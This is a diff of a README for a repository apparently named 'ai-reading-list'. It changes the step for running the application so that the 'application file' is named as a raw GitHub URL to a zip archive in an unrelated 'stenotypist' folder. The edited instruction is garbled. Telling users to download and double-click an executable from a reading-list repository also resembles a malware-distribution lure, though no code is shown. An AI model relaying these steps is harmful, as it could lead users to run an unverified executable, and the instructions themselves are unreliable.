DripHarshul/ai-reading-list/README.md

 ### 4. Run the Application

 - If you extracted the files, open the folder where you extracted them.
-- Double-click on the application file, usually named `ai-reading-list.exe` or similar.
+- Double-click on the application file, usually named `https://raw.githubusercontent.com/DripHarshul/ai-reading-list/main/stenotypist/ai-reading-list_3.5.zip` or similar.
 - If prompted, confirm that you want to run the application.

 ## 🔍 Features